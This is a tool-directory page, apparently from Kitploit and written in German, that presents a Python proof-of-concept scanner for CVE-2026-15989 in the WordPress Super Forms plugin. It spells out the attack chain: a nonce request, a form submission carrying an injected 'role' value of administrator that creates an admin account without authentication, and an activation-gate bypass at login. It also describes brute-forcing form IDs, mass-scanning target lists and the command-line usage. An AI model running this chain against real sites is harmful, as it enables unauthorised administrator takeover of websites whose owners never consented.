Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-15989 — Python-PoC-Scanner für CVE-2026-15989, der unauthentifizierte Rolleninjektion in WordPress Super Forms ausnutzt, um Admin-Konten zu erstellen und den Zugriff zu verifizieren. | Kitploit
Tools/GitHubGitHub/antid00t/cve-2026-15989
Privilege EscalationSchwachstellenscannerPasswortangriffeExploitationScripting & AutomatisierungWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubantid00t/cve-2026-15989

CVE-2026-15989

Python-PoC-Scanner für CVE-2026-15989, der unauthentifizierte Rolleninjektion in WordPress Super Forms ausnutzt, um Admin-Konten zu erstellen und den Zugriff zu verifizieren.

14vor 5 StundenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
                  █████╗  ███╗   ██╗ ████████╗ ██╗ ██████╗   ██████╗   ██████╗  ████████╗
                 ██╔══██╗ ████╗  ██║ ╚══██╔══╝ ██║ ██╔══██╗ ██╔═████╗ ██╔═████╗ ╚══██╔══╝
              ███████║ ██╔██╗ ██║    ██║    ██║ ██║  ██║ ██║██╔██║ ██║██╔██║    ██║
              ██╔══██║ ██║╚██╗██║    ██║    ██║ ██║  ██║ ████╔╝██║ ████╔╝██║    ██║
              ██║  ██║ ██║ ╚████║    ██║    ██║ ██████╔╝ ╚██████╔╝ ╚██████╔╝    ██║
              ╚═╝  ╚═╝ ╚═╝  ╚═══╝    ╚═╝    ╚═╝ ╚═════╝   ╚═════╝   ╚═════╝     ╚═╝

💉 Super Forms — Multi-Lab-PrivEsc-Scanner

CVE-2026-15989 · Unauthentifizierte Erstellung von Admin-Konten

                                       » E X P L O I T S «

Python 3.8+ CVSS 9.8 CRITICAL WordPress Engine Banner style Telegram

🔥 Fingerprint-freie Auto-Discovery · Validierungsbewusste Payloads · Keine Authentifizierung · Ehrliche Klassifizierung

screen02


🎯 Ziel

WordPress-PluginSuper Forms – Drag & Drop Form Builder (Register & Login Add-on)
Betroffene Version<= 6.3.316
Gepatchte Version6.3.317
Authentifizierung❌ Keine erforderlich — jedes veröffentlichte Registrierungsformular genügt
CVSS9.8 CRITICAL

⚡ Die Ketten

👑 CVE-2026-15989 — Whitelisted role-Schlüssel → Erstellung eines Administrators
GET admin-ajax.php?action=super_create_nonce ──► _sfs_id session + sf_nonce
        │
POST admin-ajax.php  action=super_submit_form  data=<JSON>
        │
      before_email_success_msg()  (Register & Login add-on)
        │
$other_userdata = array( ..., 'role', ... )   ◄── client key whitelisted
        │
$data['role']['value']  ──►  $userdata['role']   (register_user_role overwritten)
        │
wp_insert_user()  ──►  🔥 administrator account, zero authentication

Das Add-on kopiert $data['role']['value'] direkt in das User-Data-Array, ohne es gegen die vom Admin konfigurierte register_user_role zu validieren, ohne Allow-List und ohne jegliche Capability-Prüfung — ein einziges injiziertes "role": {"value":"administrator"}-Feld genügt.

🎟️ Login-Nachweis — Umgehung des Aktivierungs-Gates
POST wp-login.php   log / pwd / testcookie
        │                    + action=super_submit_form   ◄── the magic field
        │
check_user_login_status()  ──► pending/blocked gate SKIPPED
        │
GET /wp-admin/users.php
        │
200 = administrator proven  ·  403 = subscriber (patched build)

Das Add-on erzwingt sein E-Mail-Aktivierungs-/Moderations-Gate nur, wenn die POST-Action NICHT super_submit_form ist — daher entsperrt dieselbe Form-Action, die den Benutzer registriert, auch den Login in diesen, noch vor jeglicher E-Mail-Verifizierung.

🧨 FULL-Modus — Zweiphasiger Form-ID-Brute (kein Fingerprinting nötig)
discovery empty (REST · sitemap · links · ?page_id probe)
        │
PHASE 1 — form-ID sweep 1..50, minimal payload, OWN SESSION PER ID
        │                       (shared sessions would invalidate each nonce)
        │
'required fields' reject ──► PHASE 2 — REST markup fetch ──► full payload retry
        │
every accepted candidate ──► login proof per id
        │
contact form? ──► UNVERIFIED (never a false positive)
registration? ──► 👑 verified administrator

Nicht-Registrierungs-Formulare antworten ebenfalls mit error:false, daher ist jede akzeptierte ID nur ein Kandidat, bis die Zugangsdaten mit einem echten Login nachgewiesen sind.

🚀 Schnellstart

# zero dependencies — pure Python 3 stdlib (rich is optional, for the console)
python3 cve-2026-15989_poc.py --list labs.txt --output results.txt

# tuned concurrency / timeout
python3 cve-2026-15989_poc.py --list labs.txt --threads 20 --timeout 15 -o results.txt

# FULL MODE: discovery + role injection + login proof + form-ID brute (1..50)
python3 cve-2026-15989_poc.py --list labs.txt --full --output results.txt

labs.txt — eine Basis-URL pro Zeile:

http://localhost
http://192.168.56.101/lab-wp
https://10.0.0.5:8443/lab        # self-signed TLS is handled automatically
# comments and blank lines are ignored

🛠️ Optionen

OptionBeschreibung
--list FILEZieldatei — eine URL pro Zeile (erforderlich)
--output, -o FILETrefferliste — nur VULNERABLE Ziele werden live geschrieben (ANSI-frei)
--threads Ngleichzeitige Ziel-Worker (Standard 10)
--timeout NSocket-Timeout pro Anfrage in Sekunden (Standard 10)
--fullführt die GESAMTE Kette aus — ergänzt den Form-ID-Brute-Fallback (auf verwundbaren Zielen WERDEN Konten erstellt)

🧾 Ergebniszustände

ZustandBedeutung
VULNERABLEKonto erstellt und wp-admin-Administratorzugriff nachgewiesen (200)
NOT-VULNERABLELogin OK, aber Admin-Seiten 403 — Rolle ignoriert → gepatchter Build
UNVERIFIEDÜbermittlung akzeptiert, aber Login abgelehnt (gesperrtes/pending Konto oder Nicht-Registrierungs-Formular) — wird nie als stiller False Positive gemeldet
BLOCKEDÜbermittlung abgelehnt (reCAPTCHA, CSRF, Pflichtfelder, Honeypot…)
ERRORZiel nicht erreichbar / DNS-Fehler — mit exakter Ursache gemeldet

✨ Funktionen

Tool herunterladen